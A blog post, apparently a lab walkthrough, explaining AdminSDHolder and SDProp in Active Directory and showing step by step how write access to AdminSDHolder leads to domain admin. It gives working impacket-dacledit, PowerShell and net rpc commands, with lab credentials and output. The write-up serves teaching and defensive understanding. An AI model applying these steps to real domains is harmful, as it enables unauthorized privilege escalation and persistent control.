Post cover image

June 30, 2026

Active Directory Attacks — AdminSDHolder Abuse

AdminSDHolder is a protected Active Directory object located at CN=AdminSDHolder,CN=System,<domain>. Its security descriptor serves as the…

By Osec

4 min read

AdminSDHolder is a protected Active Directory object located at CN=AdminSDHolder,CN=System,<domain>. Its security descriptor serves as the authoritative permission template for all protected users and groups, such as members of Domain Admins, Enterprise Admins, and other privileged administrative groups.

To ensure these high-value objects cannot have their permissions altered through inherited ACLs, a domain controller process known as Security Descriptor Propagator (SDProp) runs periodically (approximately every 60 minutes). During each cycle, SDProp identifies objects with the adminCount=1 attribute, copies the security descriptor from the AdminSDHolder object to them, and disables permission inheritance (SE_DACL_PROTECTED). This guarantees that privileged accounts always maintain a consistent, centrally managed set of permissions regardless of where they reside within the directory.

Because SDProp continuously propagates the AdminSDHolder security descriptor to every protected object, any modification made to the AdminSDHolder ACL is automatically replicated across all protected users and groups during the next propagation cycle.

Abuse

If an attacker has the ability to modify the AdminSDHolder object's ACL (for example through WriteDACL, WriteOwner, GenericAll, or FullControl), they can abuse this mechanism to establish domain-wide privileged access.

By adding an ACE that grants a controlled principal powerful permissions such as GenericAll, ResetPassword, or WriteMembers the attacker effectively modifies the permission template used for every protected object. Once SDProp executes, the malicious ACE is propagated to all objects with adminCount=1, granting the controlled principal the same permissions over privileged accounts and groups.

Since SDProp periodically reapplies the AdminSDHolder security descriptor, these permissions persist even if administrators manually remove them from individual protected objects, making AdminSDHolder a powerful persistence mechanism within Active Directory.

Attack Flow

  1. Identify a principal with permissions to modify the AdminSDHolder object's ACL.
  2. Add an ACE granting a controlled principal the desired permissions (e.g., GenericAll, ResetPassword, or WriteMembers).
  3. Wait for the next SDProp cycle (approximately 60 minutes) or force SDProp to run.
  4. SDProp propagates the modified security descriptor to every protected object (adminCount=1) and reapplies protected ACLs.
  5. Leverage the newly inherited permissions to compromise privileged users or administrative groups and escalate privileges across the domain.

Enumeration

The objective of this phase is to determine whether our controlled principal can modify the AdminSDHolder object's ACL. As attackers, we need to enumerate the object's permissions and verify whether we have rights such as WriteDACL, WriteOwner, GenericAll, or FullControl, either directly or through group membership. If these permissions are present, we can proceed with the abuse.

Linux

impacket-dacledit -dc-ip 10.129.59.144 INLANEFREIGHT.LOCAL/htb-student_adm:'Academy_student_DA!' -target-dn "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL" -action read

Inspect the output for ACEs that grant your controlled principal, or any group it belongs to, permissions such as:

  • WRITE_DACL
  • WRITE_OWNER
  • GENERIC_ALL
  • GENERIC_WRITE

This script parses the output of impacket-dacledit and highlights only the ACEs that grant potentially dangerous permissions, making it easier to quickly identify high-impact privileges and the principals that possess them.

#!/usr/bin/env bash

# Dangerous permissions to look for
DANGEROUS_PERMS=(
    "FullControl"
    "GenericAll"
    "GenericWrite"
    "WriteDACL"
    "WriteOwner"
    "WriteProperty"
    "AllExtendedRights"
    "ControlAccess"
)

current_perm=""
current_trustee=""

while IFS= read -r line; do
    if [[ $line =~ Access\ mask[[:space:]]*:[[:space:]]*(.*)\ \( ]]; then
        current_perm="${BASH_REMATCH[1]}"
    fi

    if [[ $line =~ Trustee\ \(SID\)[[:space:]]*:[[:space:]]*(.*)$ ]]; then
        current_trustee="${BASH_REMATCH[1]}"

        for perm in "${DANGEROUS_PERMS[@]}"; do
            if [[ "$current_perm" == *"$perm"* ]]; then
                printf "%-35s -> %s\n" "$current_trustee" "$current_perm"
                break
            fi
        done
    fi
done

Identify protected objects by enumerating Active Directory objects with the adminCount=1 attribute, as these are the principals whose security descriptors are managed by AdminSDHolder.

ldapsearch -x -H ldap://10.129.59.144 -D "htb-student_adm@INLANEFREIGHT.LOCAL" -w 'Academy_student_DA!' -b "DC=INLANEFREIGHT,DC=LOCAL" "(adminCount=1)" sAMAccountName

Windows

dsacls "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL"

inspect the ACL of AdminSDHolder object :

$path = "LDAP://CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL"
$entry = New-Object System.DirectoryServices.DirectoryEntry($path)
$acl = $entry.ObjectSecurity
$acl.Access | Select IdentityReference, ActiveDirectoryRights, IsInherited

Enumerate protected objects ( adminCount=1 )

Get-ADUser -Filter 'adminCount -eq 1' | Select Name
Get-ADGroup -Filter 'adminCount -eq 1' | Select Name

Examples:

from linux:

impacket-dacledit -dc-ip 10.129.59.144 INLANEFREIGHT.LOCAL/htb-student_adm:'Academy_student_DA!' -target-dn "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL" -action read
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Parsing DACL
[*] Printing parsed DACL
[*]   ACE[0] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE
[*]     Access mask               : CreateChild, DeleteChild (0x7)
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : UNKNOWN (c975c901-6cea-4b6f-8319-d67f45449506)
[*]     Inherited type (GUID)     : inetOrgPerson (4828cc14-1437-45bc-9b07-ad6f015e5f28)
[*]     Trustee (SID)             : Exchange Servers (S-1-5-21-3842939050-3880317879-2865463114-5186)
[*]   ACE[1] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE
[*]     Access mask               : CreateChild, DeleteChild (0x7)
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : UNKNOWN (c975c901-6cea-4b6f-8319-d67f45449506)
[*]     Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
[*]     Trustee (SID)             : Exchange Servers (S-1-5-21-3842939050-3880317879-2865463114-5186)
[*]   ACE[2] info
[*]     ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
[*]     ACE flags                 : None
[*]     Access mask               : ControlAccess (0x100)
[*]     Flags                     : ACE_OBJECT_TYPE_PRESENT
[*]     Object type (GUID)        : DS-Replication-Synchronize (1131f6ab-9c07-11d1-f79f-00c04fc2dcd2)
[*]     Trustee (SID)             : Exchange Servers (S-1-5-21-3842939050-3880317879-2865463114-5186)

from windows:

$path = "LDAP://CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL"
PS C:\Users\htb-student_adm> $entry = New-Object System.DirectoryServices.DirectoryEntry($path)
PS C:\Users\htb-student_adm> $acl = $entry.ObjectSecurity
PS C:\Users\htb-student_adm> $acl.Access | Select IdentityReference, ActiveDirectoryRights, IsInherited
IdentityReference                                                                                 ActiveDirectoryRights
-----------------                                                                                 ---------------------
NT AUTHORITY\Authenticated Users                                                                            GenericRead
NT AUTHORITY\SYSTEM                                                                                          GenericAll
BUILTIN\Administrators                     ... WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
BUILTIN\Pre-Windows 2000 Compatible Access                                                                  GenericRead
INLANEFREIGHT\Domain Admins                ...d, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
INLANEFREIGHT\Enterprise Admins            ...d, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner
INLANEFREIGHT\Organization Management                                                                       GenericRead
INLANEFREIGHT\Exchange Trusted Subsystem                                                                    GenericRead
INLANEFREIGHT\lowuser                                                                                        GenericAll
Everyone                                                                                                  ExtendedRight
NT AUTHORITY\SELF                                                            ReadProperty, WriteProperty, ExtendedRight
NT AUTHORITY\SELF                                                                                         ExtendedRight
NT AUTHORITY\Authenticated Users                                                                           ReadProperty
...

Attack

When we identifies a write-equivalent ACE (e.g., GenericAll, WriteDACL) on AdminSDHolder, the attack consists of modifying its DACL to insert a malicious ACE granting control to a controlled principal; this change is then periodically propagated by SDProp to all protected objects (adminCount=1), overwriting their security descriptors and disabling inheritance, thereby giving the us persistent, centralized control over privileged accounts without relying on group membership.

After we do some enumeration we find out that the user lowuser ( which we control ) has FullControl on AdminSDHolder.

we will abuse that to propagate control over all objects with adminCount=1 via SDProp.

Even though you already have FullControl, you must ensure your principal is explicitly embedded in the template.

impacket-dacledit -dc-ip 10.129.59.144 INLANEFREIGHT.LOCAL/lowuser:'Password123!' -target-dn "CN=AdminSDHolder,CN=System,DC=INLANEFREIGHT,DC=LOCAL" -action write -rights FullControl -principal lowuser

we can wait for 60 minutes and it will be propagated automatically !

in our case we don't want to wait for 60 minutes so we will force it manually !

this powershell snippet will trigger the propagation.

# Connect to the RootDSE of the PDC Emulator
$PDC = (Get-ADDomain).PDCEmulator
$RootDSE = [ADSI]"LDAP://$PDC/RootDSE"

# Trigger the propagation task
$RootDSE.Put("runProtectAdminGroupsTask", "1")
$RootDSE.SetInfo()

now let's check if it works !

impacket-dacledit -dc-ip 10.129.59.144 INLANEFREIGHT.LOCAL/lowuser:'Password123!' -target-dn "CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL" -action read
...
[*]   ACE[69] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : FullControl (0xf01ff)
[*]     Trustee (SID)             : lowuser (S-1-5-21-3842939050-3880317879-2865463114-7603)
...

now we have full control over the Domain Admins AD object, let's add the user lowuser to Domain Admins group !

net rpc group addmem "Domain Admins" lowuser -U INLANEFREIGHT.LOCAL/lowuser%Password123! -S INLANEFREIGHT.LOCAL

and like that we own the domain :)

i hope you've learned something new reading this article !

Make sure you subscribe so you get notified anytime a new article got droped !

Follow me on X : https://x.com/osec403